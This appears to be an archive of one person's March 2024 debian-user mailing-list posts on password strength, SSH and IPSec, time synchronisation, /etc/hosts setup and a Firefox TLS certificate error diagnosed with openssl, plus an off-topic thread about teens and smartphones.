> >> your disk that hopefully you encrypted and then your session. And if
> >> your laptop is borken, then having a root password you actually can
> >> remember is better.
> >
> > I believe NIST now approves online password managers. But I don't
> > trust them given the number of data breaches.
>
> Yes, but I wouldn't dare use one.

Jeff

Re: Root password strength

[Jeffrey Walton]

On Wed, Mar 20, 2024 at 12:09 PM Pierre-Elliott Bécue  wrote:
>
> John Hasler  wrote on 20/03/2024 at 16:58:01+0100:
>
> > Pierre-Elliott Bécue writes:
> >> A phrase you will easily remember but that would be hardcore to guess
> >> through social engineering is perfect.
> >
> > Better is a random string that you write down.  When people try to
> > generate phrases that meet those requirements they usually fail.
>
> Writing down a password is a bad idea.

I don't think that's true anymore. The threat being mitigated is the
network attacker. The network attacker cannot (yet) reach through a
monitor and read a sticky note.

It is also why its Ok for a system to generate a list of recovery
codes, and have the user print them and store them in a safe place.
The other option are those cursed security questions, which have been
insecure for about 20 years now (but developers have their arms
wrapped around).

> Managing passwords through a password-store (eg pass, keepassxc,
> whatever tool you prever) is a great idea, but you first need to unlock
> your disk that hopefully you encrypted and then your session. And if
> your laptop is borken, then having a root password you actually can
> remember is better.

I believe NIST now approves online password managers. But I don't
trust them given the number of data breaches.

> Let's stop to overcomplexify, the best course of action for passwords
> you need to remember are passphrases, and to this matter, Randall nailed
> the matter properly.

Jeff

Re: Root password strength

[Jeffrey Walton]

On Wed, Mar 20, 2024 at 7:03 AM Michael Kjörling <2695bd53d...@ewoof.net> wrote:
>
> On 20 Mar 2024 15:46 +0800, from jeremy.ard...@gmail.com (jeremy ardley):
> > Regarding certificates, I issue VPN certificates to be installed on each
> > remote device. I don't use public key.
>
> What exactly is this "certificate" that you speak of? In typical
> usage, it means a public key plus some surrounding metadata, but you
> say that you "don't use public key".
>
>
> > For ssh use I issue secret keys to each user and maintain matching public
> > keys in LDAP servers.  SSHD servers can get the public keys in real time by
> > using the AuthorizedKeysCommand. If a secret key is compromised I simply
> > remove the matching public key.
> >
> > [users are locked out from uploading their public key using ssh-copy-id]
>
> So the private keys aren't private, thereby invalidating a lot of
> assumptions inherent in public key cryptography.
>
> Also, are you saying that you do not let users rotate their keys
> themselves; and if so, why on Earth not?

Key continuity has turned out to be a better security property than
key rotation. It is wise to avoid gratuitous rotation schemes.

Jeff

Re: Root password strength

[Jeffrey Walton]

On Wed, Mar 20, 2024 at 1:32 AM  wrote:
>
> On Wed, Mar 20, 2024 at 04:22:29AM +0800, jeremy ardley wrote:
>
> > A 'safer' implementation will not even expose an ssh port. Instead there
> > will be a certificate based VPN where you first need a certificate to
> > connect and then you need a separate certificate to log in as root. A
> > further enhancement of security is to use 2-factor authentication - which is
> > supported in sshd via pam.
>
> How will a "VPN" with a "certificate" (whatever that means in this context)
> be more secure than a SSH (assuming key pair authentication, not password)?

This may be more theoretical, but... IPSec uses
Encrypt-then-Authenticate (EtA), which is provably secure under random
models. In fact, I believe IPSec is IND-CCA2 secure (Ciphertext
Indistinguishability), which is a strong notion of security. SSH uses
Encrypt-and-Authenticate (E), which is provably insecure. The SSH
protocol leaks information because of the order of operations of
encryption and authentication.

As far as the certificate, I suspect it alludes to public key. Both
IPSec and SSH can use public key cryptography (as opposed to
passwords), so they are about equally secure (compared to passwords).
IPSec is actually a little stronger with provable security properties
because it uses HKDF after key agreement to derive bulk encryption
keys. And I believe IPSec performs a key conformation step, which
helps with the security proofs.

The IPSec standard is maintained by Hugo Krawczyk and associates. Hugo
is a world class cryptographer. That's why the IPSec protocol does not
have the theoretical defects of SSH (or TLS).

Krawczyk is also the author of The Order of Encryption and
Authentication for Protecting Communications,
. It is a very
good paper.

> They are doing the same dance (key exchange, key pair validation, session
> key establishment) -- the "certificate" part is just a step further (and,
> BTW, SSH can do that, too), which just eases key management (at the expense
> of security: you have but one more moving part).
>
> The "port" thing stays the same: the VPN server uses a TCP connection, too.
>
> Moving the port to a non-standard number, using fail2ban, firewall knocking
> and those things don't increase security *directly* -- they just remove
> noise from the logs, which eases the admin's task and thus increase security
> indirectly.
>
> There's no magic.

Jeff

Re: After installing no access to the installed system.

[Jeffrey Walton]

On Mon, Mar 18, 2024 at 4:32 PM Thomas Schweikle  wrote:
>
> Am Mo., 18.März.2024 um 16:44:32 schrieb Greg Wooledge:
> > On Mon, Mar 18, 2024 at 03:24:14PM +0100, Thomas Schweikle wrote:
> >> Package: Debian installer
> >> Version: As on Debian live-CD/DVD for Debian 12.5
> >> Severity: critical
> >
> > Note that you sent this email to the debian-user list, not to the bug
> > tracking system.
>
> I know. The bog tracking system wants me to use reportbug, but since I
> do not have access to the installed system i cant use reportbug to
> report a bug.

You could email the report to sub...@bugs.debian.org. No need for
reportbug. See "How to report a bug in Debian using email,"
.

Jeff

Re: OT: End the Phone-Based Childhood Now

[Jeffrey Walton]

On Fri, Mar 15, 2024 at 8:04 PM Emanuel Berg  wrote:
>
> Jeffrey Walton wrote:
>
> > So the problem with GenZ seems to be how they are growing up
> > and what they are spending their time on; and not their job
> > (they are teens!)
>
> They need other things to do that appeal to them more than
> smartphone idling. If such things existed, they would go
> for them, I'm confident.
>
> But it is also how things are presented, what mental picture
> they have, which is often incorrect. Today almost all
> activities, even pretty mundane things that were once thought
> of as relaxing and potentially inclusive to a whole bunch of
> people, are presented as elitist pursuits for the select few.
>
> They think, for example, "Martial arts seems like a lot of
> fun, but it is nothing for me, everyone who does it are great
> athletes and clearly I'm not." while in reality it is "_A lot_
> of people who does it are great athletes - and the reason why
> is because they do it". These kids only need to show up, but
> sadly, a lot of them don't, ever.
>
> So it is a vicious circle, the more they think they have to be
> brilliant to do anything the less confident they become from
> doing nothing.
>
> > and not society around them (which they withdraw from).
>
> Society pushed them away just as much.

I've got a feeling you did not read the article.

Jeff

Re: OT: End the Phone-Based Childhood Now

[Jeffrey Walton]

On Fri, Mar 15, 2024 at 7:09 PM Emanuel Berg  wrote:
>
> Jeffrey Walton wrote:
>
> > Fascinating reading here:
> > <https://www.theatlantic.com/technology/archive/2024/03/teen-childhood-smartphone-use-mental-health-effects/677722/>.
> > It completely explains why GenZ are having so many problems
> > with adulthood. Smartphones and Social Media are
> > the culprits.
>
> Society is the problem where you are either an elite prospect
> football player, a professional carpenter/construction worker,
> _or_ you don't get to do anything, ever.

The article did not discuss employment or socio-economics, other than to say:

The most recent Gallup data show that American teens spend about five
hours a day just on social-media platforms (including watching videos
on TikTok and YouTube). Add in all the other phone- and screen-based
activities, and the number rises to somewhere between seven and nine
hours a day, on average. The numbers are even higher in single-parent
and low-income families, and among Black, Hispanic, and Native American
families.

These very high numbers do not include time spent in front of screens
for school or homework, nor do they include all the time adolescents
spend paying only partial attention to events in the real world while
thinking about what they’re missing on social media or waiting for
their phones to ping. Pew reports that in 2022, one-third of teens said
they were on one of the major social-media sites “almost constantly,”
and nearly half said the same of the internet in general. For these
heavy users, nearly every waking hour is an hour absorbed, in full or
in part, by their devices.

So the problem with GenZ seems to be how they are growing up and what
they are spending their time on; and not their job (they are teens!),
and not society around them (which they withdraw from).

Jeff

Re: Please terminate this faecal matter - the whole thread appears to be a troll.....Re: Inclusive terminology (instead of master/slave) for network bonding/LACP

[Jeffrey Walton]

On Fri, Mar 15, 2024 at 2:59 PM Bret Busby  wrote:
>
> On 16/3/24 02:27, Van Snyder wrote:
> > On Fri, 2024-03-15 at 11:09 -0700, Will Mengarini wrote:
> >> Seriously, you humans have only another five billion Earth years until
> >> your sun engulfs your home planet, and you're spending time on *THIS*?!
> >
> > At the rate that sea plants and creatures are removing CO2 from the
> > atmosphere to combine it with calcium to make bones and armor,
> > eventually eternal limestone, we have only about eighteen million years
> > until Gaia commits suicide. Why should we continue to be complicit?
> >
> > Read Patrick Moore. The Positive Impact of Human CO2 Emissions on the
> > Survival of Life on Earth. Frontier Science for Public Policy, June 2016.

++. That whole thread was fecal matter. Best to let it die...

Jeff

OT: End the Phone-Based Childhood Now

[Jeffrey Walton]

Fascinating reading here:
.
It completely explains why GenZ are having so many problems with
adulthood. Smartphones and Social Media are the culprits.

>From the article:

Something went suddenly and horribly wrong for adolescents in the early
2010s. By now you’ve likely seen the statistics: Rates of depression
and anxiety in the United States—fairly stable in the 2000s—rose by
more than 50 percent in many studies from 2010 to 2019. The suicide
rate rose 48 percent for adolescents ages 10 to 19. For girls ages 10
to 14, it rose 131 percent.

The problem was not limited to the U.S.: Similar patterns emerged
around the same time in Canada, the U.K., Australia, New Zealand, the
Nordic countries, and beyond. By a variety of measures and in a variety
of countries, the members of Generation Z (born in and after 1996) are
suffering from anxiety, depression, self-harm, and related disorders at
levels higher than any other generation for which we have data.

The decline in mental health is just one of many signs that something
went awry. Loneliness and friendlessness among American teens began to
surge around 2012. Academic achievement went down, too. According to
“The Nation’s Report Card,” scores in reading and math began to decline
for U.S. students after 2012, reversing decades of slow but generally
steady increase. PISA, the major international measure of educational
trends, shows that declines in math, reading, and science happened
globally, also beginning in the early 2010s.

And:

Surveys show that members of Gen Z are shyer and more risk averse than
previous generations, too, and risk aversion may make them less
ambitious. In an interview last May, OpenAI co-founder Sam Altman and
Stripe co-founder Patrick Collison noted that, for the first time since
the 1970s, none of Silicon Valley’s preeminent entrepreneurs are under
30. “Something has really gone wrong,” Altman said. In a famously young
industry, he was baffled by the sudden absence of great founders in
their 20s.

If you can't read the whole article, head on over to the Wayback Machine.

Jeff

Re: libbusiness-us-usps-webtools-perl and USPS Ground Advantage shipping

[Jeffrey Walton]

On Fri, Mar 8, 2024 at 10:16 AM Charles Curley
 wrote:
>
> On Thu, 7 Mar 2024 23:15:13 -0500
> Jeffrey Walton  wrote:
>
> > I need to generate some shipping labels for drop-off at the USPS post
> > office using USPS Ground Advantage.
> >
> > I have a USB thermal printer for the shipping labels,
> > <https://www.amazon.com/gp/product/B08V28J3JS>.
> >
> > I see Debian carries libbusiness-us-usps-webtools-perl. I visited the
> > module's GitHub at
> > <https://github.com/ssimms/business-us-usps-webtools>, but the
> > examples are on the lite side. I don't see a workflow similar to
> > creating and printing a shipping label.
> >
> > My question is, can I use the module to create and print a shipping
> > label for a USPS Ground Advantage package?
>
> charles@jhegaala:~$ apt-cache show libbusiness-us-usps-webtools-perl
> Package: libbusiness-us-usps-webtools-perl
> Version: 1.125-2
> [...]
>
> So I would start at the web site for the Web Tools.
> http://www.usps.com/webtools/
>
> On a brief scan of that site, I think the answer is yes, but you have
> some software development ahead of you.

Yeah, I was thinking the perl package is not very useful. I don't need
a perl wrapper to make a web service call. I need the other value
added stuff, like printing a label once I receive a successful
response.

Thanks.

Jeff

libbusiness-us-usps-webtools-perl and USPS Ground Advantage shipping

[Jeffrey Walton]

Hi Everyone,

I need to generate some shipping labels for drop-off at the USPS post
office using USPS Ground Advantage.

I have a USB thermal printer for the shipping labels,
.

I see Debian carries libbusiness-us-usps-webtools-perl. I visited the
module's GitHub at
, but the
examples are on the lite side. I don't see a workflow similar to
creating and printing a shipping label.

My question is, can I use the module to create and print a shipping
label for a USPS Ground Advantage package?

Thanks in advance.

Re: Commandline client to lookup MAC vendor

[Jeffrey Walton]

On Thu, Mar 7, 2024 at 4:06 AM Ralph Aichinger  wrote:
>
> Several packages in Debian can somehow (either by embedding it or
> querying it from some common database) display the MAC Vendor
> information of network adapters (derived from hardware addresses).
>
> One example is nmap, that displays the device vendor when scanning.
>
> Is there some commandline tool doing this directly in Debian? I know
> that there are websites that offer this as a service, but sometimes a
> CLI is more convenient.
>
> Alternatively, and if this information is stored in some shared
> databases, can this be queried e.g. from a Pyhton script? If so, how?

Here's a Python project that does what you want:
. The update function
uses  as Lee suggested.

Jeff

Re: strange time problem with bullseye

[Jeffrey Walton]

On Thu, Mar 7, 2024 at 8:44 AM  wrote:
>
> On Thu, Mar 07, 2024 at 08:31:16AM -0500, gene heskett wrote:
>
> [...]
> Now, how do I assure timedatectl stays stopped on a reboot? [...]
>
> I'll have to leave this to others more fluent in systemd-ish.

Mask the systemd-timesyncd service. Masking is the service a permanent effect.

If you just stop or disable the service, then the service will either
be started on the next reboot, or it can be manually started. Since
you want to permanently disable the service, you have to mask it.

Jeff

Re: strange time problem with bullseye

[Jeffrey Walton]

On Wed, Mar 6, 2024 at 7:08 AM Greg Wooledge  wrote:
>
> On Wed, Mar 06, 2024 at 07:37:09AM +0200, Teemu Likonen wrote:
> > It seems that you have solved the problem but here is another hint.
> > "timedatectl" is a good high-level tool for querying and adjusting time
> > settings. Without command-line arguments it prints a lot of useful info:
> >
> > $ timedatectl
> >Local time: ke 2024-03-06 07:33:00 EET
> >Universal time: ke 2024-03-06 05:33:00 UTC
> >  RTC time: ke 2024-03-06 05:33:00
> > Time zone: Europe/Helsinki (EET, +0200)
> > System clock synchronized: yes
> >   NTP service: active
> >   RTC in local TZ: no
> >
> > See "timedatectl -h" or manual page for more info.
>
> This is a great hint, but be warned that it doesn't quite know about
> NTP services other than systemd-timesyncd.  If you're running ntpsec,
> for example, it'll simply say:
>
> System clock synchronized: yes
>   NTP service: n/a

This may help in the future:
.

Jeff

Re: strange time problem with bullseye

[Jeffrey Walton]

On Wed, Mar 6, 2024 at 12:13 PM Roy J. Tellason, Sr.  wrote:
>
> On Wednesday 06 March 2024 12:37:09 am Teemu Likonen wrote:
> > * 2024-03-06 02:47:06+0800, hlyg wrote:
> >
> > > my newly-installed deb11 for amd64 shows wrong time,  it lags behind
> > > correct time by 8 hours though difference between universal and local
> > > is ok.
> >
> > It seems that you have solved the problem but here is another hint.
> > "timedatectl" is a good high-level tool for querying and adjusting time
> > settings. Without command-line arguments it prints a lot of useful info:
> >
> > $ timedatectl
> >Local time: ke 2024-03-06 07:33:00 EET
> >Universal time: ke 2024-03-06 05:33:00 UTC
> >  RTC time: ke 2024-03-06 05:33:00
> > Time zone: Europe/Helsinki (EET, +0200)
> > System clock synchronized: yes
> >   NTP service: active
> >   RTC in local TZ: no
> >
> > See "timedatectl -h" or manual page for more info.
> >
>
> Mine shows:
>
>   Local time: Wed 2024-03-06 12:09:44 EST
>   Universal time: Wed 2024-03-06 17:09:44 UTC
> RTC time: Wed 2024-03-06 17:20:53
>Time zone: America/New_York (EST, -0500)
>  Network time on: yes
> NTP synchronized: no
>  RTC in local TZ: no
>
> How do I get the RTC to agree with the right time?  I don't reboot this 
> often,  but when I do the time displayed on the onscreen clock is typically 
> off by several minutes.

Install ntp, ntpsec or systemd-timesyncd. Once installed and time is
sync'd, run 'sudo hwclock -w'.

Also see  and
.

Jeff

Re: strange time problem with bullseye

[Jeffrey Walton]

On Tue, Mar 5, 2024 at 7:07 PM hlyg  wrote:
>
>  [...]
>
> Windows shall not cause problem, i rarely use Windows
>
> i don't know if ntp is running, what's default configuration by deb11
> amd64 installer?

If you are dual booting Linux and Windows, then see
.

Jeff

Re: Debian 12 live cd username and password problem

[Jeffrey Walton]

On Tue, Mar 5, 2024 at 11:30 AM Jeffrey Walton  wrote:
>
> On Tue, Mar 5, 2024 at 11:22 AM genti pp  wrote:
> >
> > I want to install debian 12 but I need to try it first.
> > Having Debian 12 live iso it asks me for username and password. Please tell 
> > me the correct username and password so I can try it.
>
> I usually use 'sudo su -' from the command line. Sometimes it does not
> prompt for a password. I don't recall if that's the case for a Debian
> Live cd.
>
> A quick Google search also turns up {user,live} pairs. I'm not sure if
> it is correct because I don't see a _recent_ answer from debian.org.
> Also see 
> <https://www.google.com/search?q=Debian+Live+password+site:debian.org>.

This information is now documented at
<https://wiki.debian.org/Root#Debian_Live_CD>. It was tested against a
Live CD for Debian 12.5.

Jeff

Re: Debian 12 live cd username and password problem

[Jeffrey Walton]

On Tue, Mar 5, 2024 at 11:22 AM genti pp  wrote:
>
> I want to install debian 12 but I need to try it first.
> Having Debian 12 live iso it asks me for username and password. Please tell 
> me the correct username and password so I can try it.

I usually use 'sudo su -' from the command line. Sometimes it does not
prompt for a password. I don't recall if that's the case for a Debian
Live cd.

A quick Google search also turns up {user,live} pairs. I'm not sure if
it is correct because I don't see a _recent_ answer from debian.org.
Also see .

Jeff

Re: a couple rpi problems

[Jeffrey Walton]

On Mon, Mar 4, 2024 at 11:07 PM ghe2001  wrote:
>
> On Monday, March 4th, 2024 at 5:01 PM, Greg Wooledge  
> wrote:
> [...]
> > So, "pi5" appears to be your hostname.
>
> Yup.
>
> > It can't resolve its own hostname. You're probably missing a line in
> > your /etc/hosts file.
>
> Oh!  It wants the IP!  You're right -- pi5 isn't in there.  Thanks.

Here's what one looks like for a host named 'raptor' after the Intel ISA:

$ cat /etc/hosts
# Loopback entries; do not change.
# For historical reasons, localhost precedes localhost.localdomain:
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4

# 127.0.1.1 is often used for the FQDN of the machine
127.0.1.1   raptor.home.arpa raptor

# The following lines are desirable for IPv6 capable hosts
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6

Re: Wifi - unable to connect. [solved]

[Jeffrey Walton]

On Mon, Mar 4, 2024 at 4:58 PM Greg  wrote:
>
> On 2/26/24 18:52, Kamil Jońca wrote:
> [...]
> >
> > What if:
> > network = {
> >   ssid="ssid"
> >   key_mgmt=WPA-EAP
> >   eap=PEAP
> >   identity="uid"
> >   phase2="auth=MSCHAPV2"
> >   mesh_fwding=1
> >   password="pas"
> >   }

The MSCHAPv2 is like a dagger in my eye. Are you required to use it?



Jeff

Re: resolv.conf (was Re: electrons/the Internet [racism redacted])

[Jeffrey Walton]

On Mon, Mar 4, 2024 at 4:12 PM Greg Wooledge  wrote:
>
> On Mon, Mar 04, 2024 at 12:36:54PM -0800, David Christensen wrote:
> > I believe Debian rewrites /etc/resolv.conf on every boot.
>
> This is not correct.  It's *partly* correct if you ignore a lot of
> complicating factors.
> [...]
>
> All of this is documented on 
> but it's a virtual certainty that nobody in this thread will read that
> wiki page and select a strategy and implement it and be happy.  Instead,
> we will have another hundred-message argument, in which half the
> participants will have no idea what the issue is (but will chime in loudly
> anyway), and the second half will simply attack whatever strategies the
> third half have selected.

Lol... so true. The internet never misses an opportunity to argue!

> resolv.conf (was Re: electrons/the Internet [racism redacted])

And I think I hear someone approaching with the Mjölnir hammer.
Someone might be plonked over the head.

Jeff

Re: “Secure Connection Failed” Error in Firefox

[Jeffrey Walton]

On Sun, Mar 3, 2024 at 2:02 PM Jeffrey Walton  wrote:
>
> On Sun, Mar 3, 2024 at 1:47 PM Marcelo Laia  wrote:
> >
> > Hello Debian users!
> >
> > When accessing the website https://gontijoonibus.gontijo.com.br/ on Firefox 
> > Android (on my smartphone), the site is accessed normally. However, when 
> > attempting to access this site on the desktop, Debian Firefox-ESR version 
> > 115.8.0esr (64-bit), the following error occurs:
> >
> > Secure Connection Failed
> > An error occurred during a connection to gontijoonibus.gontijo.com.br.
> > The page you are trying to view cannot be displayed because the 
> > authenticity of the received data could not be verified.
> > Please contact the website owners to inform them of this problem.
>
> According to OpenSSL and the default CA list on Ubuntu 22.04, the
> connection looks Ok. The problem appears to be more than a simple
> problem connecting.
>
> If I had to hazard a guess, I would start with the wildcard in the
> Common Name (CN) shown below. I know the CA/Browser Baseline
> Requirements changed recently, and CN is now a SHOULD NOT. Wildcards
> have been frowned upon but not forbidden. Maybe the browsers are
> moving against wildcards in the CN now.
>
> Note: tooling, like cURL, OpenSSL and Wget follow the IETF's Internet
> PKI (PKIX). Browsers follow the CA/Browsers Baseline Requirements (Web
> PKI). They mostly overlap, but they have a fair amount of differences
> once you accumulate some knowledge about them.
>
> And the IETF lawyers wrote a nasty letter to the W3C a couple of years
> ago because the W3C was publishing incompatible standards. See
> <https://www.ietf.org/media/documents/2023.01.26_Correspondence_IETF.pdf>.
> And from my observations, the CA/Browser Forums have been doing the
> same thing. So I would not be surprised if there's an incompatible
> change between PKIX and Web PKI.
>
> 
> $ echo -e 'GET / HTTP/1.1\r\n\r\n' | openssl s_client -connect
> gontijoonibus.gontijo.com.br:443 -servername
> gontijoonibus.gontijo.com.br
> CONNECTED(0003)
> depth=2 C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
> Global Root G2
> verify return:1
> depth=1 C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte
> TLS RSA CA G1
> verify return:1
> depth=0 CN = *.gontijo.com.br
> verify return:1
> ---
> Certificate chain
>  0 s:CN = *.gontijo.com.br
>i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte TLS RSA CA 
> G1
>a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
>v:NotBefore: May  9 00:00:00 2023 GMT; NotAfter: May  8 23:59:59 2024 GMT
>  1 s:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte TLS RSA CA 
> G1
>i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
> Global Root G2
>a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
>v:NotBefore: Nov  2 12:24:25 2017 GMT; NotAfter: Nov  2 12:24:25 2027 GMT
>  2 s:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
> Global Root G2
>i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
> Global Root G2
>a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
>v:NotBefore: Aug  1 12:00:00 2013 GMT; NotAfter: Jan 15 12:00:00 2038 GMT
> ---
> Server certificate
> -BEGIN CERTIFICATE-
> MIIGITCCBQmgAwIBAgIQB7Bs73IlM/884Dqb8/YZoTANBgkqhkiG9w0BAQsFADBe
> MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
> d3cuZGlnaWNlcnQuY29tMR0wGwYDVQQDExRUaGF3dGUgVExTIFJTQSBDQSBHMTAe
> Fw0yMzA1MDkwMDAwMDBaFw0yNDA1MDgyMzU5NTlaMBsxGTAXBgNVBAMMECouZ29u
> dGlqby5jb20uYnIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDNoYUM
> EjKsU7gHu5iZpkwZkwJGyMe1l5d1+YVUJLkB23vxGXxSRoYVOqhPR/sbvyue0FFA
> OwbKriu+XjXA/dCOC6hEX9UbvHK9i5YFaPbJIDkwZKuA3SltFSyJsuRNP7dpYEkY
> uxZ4pcLBtEAh9+im1g5l4ubrFDrxdr5Wvjne6viDyZ+40Alc+i1pirlymsD7k6tH
> 4bLaR+qopr6YqufzOkWlcodNbCnQ3TF1ZOVppwJDYvWaROQ8WcUC5c3v4TDYcXrq
> YasWMtN2GL+UwQL4Gc/q9slkpG1ML8lX50CwxhGAngjz8PdNq9ql+kHa9XfTx+5G
> DYrshriHimk9POppAgMBAAGjggMcMIIDGDAfBgNVHSMEGDAWgBSljP4yzOsPLNQZ
> xgi4ACSIXcPFtzAdBgNVHQ4EFgQUOgqjT5nVOc1VYZ8vm/Y80TI7UIEwKwYDVR0R
> BCQwIoIQKi5nb250aWpvLmNvbS5icoIOZ29udGlqby5jb20uYnIwDgYDVR0PAQH/
> BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjA7BgNVHR8ENDAy
> MDCgLqAshipodHRwOi8vY2RwLnRoYXd0ZS5jb20vVGhhd3RlVExTUlNBQ0FHMS5j
> cmwwPgYDVR0gBDcwNTAzBgZngQwBAgEwKTAnBggrBgEFBQcCARYbaHR0cDovL3d3
> dy5kaWdpY2VydC5jb20vQ1BTMHAGCCsGAQUFBwEBBGQwYjAkBggrBgEFBQcwAYYY
> aHR0cDovL3N0YXR1cy50aGF3dGUuY29tMDoGCCsGAQUFBzAChi5odHRwOi8vY2Fj
> ZXJ0cy50aGF3dGUuY29tL1RoYXd0ZVRMU1JTQUNBRzEuY3J0MAkGA1UdEwQCMAAw
> ggF+BgorBgEEAdZ5AgQCBIIBbgSCAWoBaAB2AO7N0GTV2xrOxVy3nbTNE6Iyh0Z8
> vOzew1FIWUZxH7WbAAABi

Re: “Secure Connection Failed” Error in Firefox

[Jeffrey Walton]

On Sun, Mar 3, 2024 at 1:47 PM Marcelo Laia  wrote:
>
> Hello Debian users!
>
> When accessing the website https://gontijoonibus.gontijo.com.br/ on Firefox 
> Android (on my smartphone), the site is accessed normally. However, when 
> attempting to access this site on the desktop, Debian Firefox-ESR version 
> 115.8.0esr (64-bit), the following error occurs:
>
> Secure Connection Failed
> An error occurred during a connection to gontijoonibus.gontijo.com.br.
> The page you are trying to view cannot be displayed because the authenticity 
> of the received data could not be verified.
> Please contact the website owners to inform them of this problem.

According to OpenSSL and the default CA list on Ubuntu 22.04, the
connection looks Ok. The problem appears to be more than a simple
problem connecting.

If I had to hazard a guess, I would start with the wildcard in the
Common Name (CN) shown below. I know the CA/Browser Baseline
Requirements changed recently, and CN is now a SHOULD NOT. Wildcards
have been frowned upon but not forbidden. Maybe the browsers are
moving against wildcards in the CN now.

Note: tooling, like cURL, OpenSSL and Wget follow the IETF's Internet
PKI (PKIX). Browsers follow the CA/Browsers Baseline Requirements (Web
PKI). They mostly overlap, but they have a fair amount of differences
once you accumulate some knowledge about them.

And the IETF lawyers wrote a nasty letter to the W3C a couple of years
ago because the W3C was publishing incompatible standards. See
.
And from my observations, the CA/Browser Forums have been doing the
same thing. So I would not be surprised if there's an incompatible
change between PKIX and Web PKI.


$ echo -e 'GET / HTTP/1.1\r\n\r\n' | openssl s_client -connect
gontijoonibus.gontijo.com.br:443 -servername
gontijoonibus.gontijo.com.br
CONNECTED(0003)
depth=2 C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
Global Root G2
verify return:1
depth=1 C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte
TLS RSA CA G1
verify return:1
depth=0 CN = *.gontijo.com.br
verify return:1
---
Certificate chain
 0 s:CN = *.gontijo.com.br
   i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte TLS RSA CA G1
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: May  9 00:00:00 2023 GMT; NotAfter: May  8 23:59:59 2024 GMT
 1 s:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte TLS RSA CA G1
   i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
Global Root G2
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Nov  2 12:24:25 2017 GMT; NotAfter: Nov  2 12:24:25 2027 GMT
 2 s:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
Global Root G2
   i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
Global Root G2
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Aug  1 12:00:00 2013 GMT; NotAfter: Jan 15 12:00:00 2038 GMT
---
Server certificate
-BEGIN CERTIFICATE-
MIIGITCCBQmgAwIBAgIQB7Bs73IlM/884Dqb8/YZoTANBgkqhkiG9w0BAQsFADBe
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMR0wGwYDVQQDExRUaGF3dGUgVExTIFJTQSBDQSBHMTAe
Fw0yMzA1MDkwMDAwMDBaFw0yNDA1MDgyMzU5NTlaMBsxGTAXBgNVBAMMECouZ29u
dGlqby5jb20uYnIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDNoYUM
EjKsU7gHu5iZpkwZkwJGyMe1l5d1+YVUJLkB23vxGXxSRoYVOqhPR/sbvyue0FFA
OwbKriu+XjXA/dCOC6hEX9UbvHK9i5YFaPbJIDkwZKuA3SltFSyJsuRNP7dpYEkY
uxZ4pcLBtEAh9+im1g5l4ubrFDrxdr5Wvjne6viDyZ+40Alc+i1pirlymsD7k6tH
4bLaR+qopr6YqufzOkWlcodNbCnQ3TF1ZOVppwJDYvWaROQ8WcUC5c3v4TDYcXrq
YasWMtN2GL+UwQL4Gc/q9slkpG1ML8lX50CwxhGAngjz8PdNq9ql+kHa9XfTx+5G
DYrshriHimk9POppAgMBAAGjggMcMIIDGDAfBgNVHSMEGDAWgBSljP4yzOsPLNQZ
xgi4ACSIXcPFtzAdBgNVHQ4EFgQUOgqjT5nVOc1VYZ8vm/Y80TI7UIEwKwYDVR0R
BCQwIoIQKi5nb250aWpvLmNvbS5icoIOZ29udGlqby5jb20uYnIwDgYDVR0PAQH/
BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjA7BgNVHR8ENDAy
MDCgLqAshipodHRwOi8vY2RwLnRoYXd0ZS5jb20vVGhhd3RlVExTUlNBQ0FHMS5j
cmwwPgYDVR0gBDcwNTAzBgZngQwBAgEwKTAnBggrBgEFBQcCARYbaHR0cDovL3d3
dy5kaWdpY2VydC5jb20vQ1BTMHAGCCsGAQUFBwEBBGQwYjAkBggrBgEFBQcwAYYY
aHR0cDovL3N0YXR1cy50aGF3dGUuY29tMDoGCCsGAQUFBzAChi5odHRwOi8vY2Fj
ZXJ0cy50aGF3dGUuY29tL1RoYXd0ZVRMU1JTQUNBRzEuY3J0MAkGA1UdEwQCMAAw
ggF+BgorBgEEAdZ5AgQCBIIBbgSCAWoBaAB2AO7N0GTV2xrOxVy3nbTNE6Iyh0Z8
vOzew1FIWUZxH7WbAAABiABkUyYAAAQDAEcwRQIgfzcKflXhHpmu5GHg8S048cs8
vpP1gxpdWDsSoIW7iBICIQDMDeAMb6rf8XcdLAxVXeScb4DE6WI73WrxLuhijv7O
+gB2AEiw42vapkc0D+VqAvqdMOscUgHLVt0sgdm7v6s52IRzAAABiABkUyUAAAQD
AEcwRQIgP46qqZOnzi6Zp+F30GBTHY5LpCR9uL55MFTS+XnRsv0CIQDTC52xy9Gl
